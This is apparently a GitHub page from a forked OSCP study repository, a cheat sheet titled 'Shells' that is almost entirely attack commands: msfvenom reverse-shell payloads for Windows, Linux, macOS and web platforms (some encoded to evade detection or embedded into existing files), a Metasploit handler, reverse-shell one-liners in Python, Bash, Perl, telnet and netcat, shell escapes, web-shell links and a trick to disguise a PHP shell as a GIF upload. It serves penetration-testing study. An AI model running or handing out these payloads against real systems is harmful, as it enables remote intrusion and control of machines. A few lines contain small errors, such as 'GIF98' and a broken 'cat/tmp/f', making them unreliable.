forked from sd-geek/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 14
/
12 - Shells
118 lines (81 loc) · 4.17 KB
/
12 - Shells
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
---------------- MSVenom ----------------
Windows:
msfvenom -a x86 -x <[FILE]> -k -p windows/meterpreter/reverse_tcp lhost=10.11.0.88 lport=443 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o <[FILE_NAME]>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f exe > <[FILE_NAME.exe]>
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f elf > <[FILE_NAME.elf]>
MAC:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f macho > <[FILE_NAME.macho]>
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.php]>
cat <[FILE_NAME.php]> | pbcopy && echo '<?php ' | tr -d '\n' > <[FILE_NAME.php]> && pbpaste >> <[FILE_NAME.php]>
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f asp > <[FILE_NAME.asp]>
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.jsp]>
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f war > <[FILE_NAME.war]>
Python:
msfvenom -p cmd/unix/reverse_python LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.py]>
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.sh]>
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.pl]>
Staged Payload: Windows/shell_reverse_tcp
msfvenom -a x86 -p linux/x86/shell/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_STAGED]>
Non Staged: Windows/shell/reverse_tcp
msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_NON_STAGED]>
---------------- Metasploit ----------------
Handlers:
use exploit/multi/handler
set PAYLOAD <[PAYLOAD_NAME]>
set LHOST <[IP]>
set LPORT <[PORT]>
set ExitOnSession false
exploit -j -z
---------------- Shell Spawning ----------------
Python:
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<[IP]>",<[PORT]>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Bash:
echo os.system('/bin/bash')
/bin/sh -i
exec 5<>/dev/tcp/<[IP]>/<[PORT]> cat <&5 | while read line; do $line 2>&5 >&5; done
Perl:
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
perl -e 'use Socket;$i="<[IP]>";$p=<[PORT]>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Telnet:
mknod /tmp/yyy p && /bin/bash 0</tmp/yyy | telnet <[IP]> <[PORT]> 1>/tmp/yyy
Ruby:
ruby: exec "/bin/sh"
Lua:
lua: os.execute('/bin/sh')
From within IRB:
exec "/bin/sh"
From within vi:
:!bash
From within vi:
:set shell=/bin/bash:shell
From within nmap:
!sh
----------------- Websites -----------------
Pen test monkey PHP reverse shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shel
php-findsock-shell - turns PHP port 80 into an interactive shell
http://pentestmonkey.net/tools/web-shells/php-findsock-shell
Perl Reverse Shell
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
PHP powered web browser Shell b374k with file upload etc.
https://github.com/b374k/b374k
Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
Web Backdoors from Fuzzdb ( https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
----------------- webshell upload -----------------
Upload php shell as gif
Edit the php file and add GIF98 at the top.
GIF98
<?PHP
// this is the contents of the script
----------------- Reverse Shell One Liner -----------------
rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc <IP Address> 1234 > /tmp/f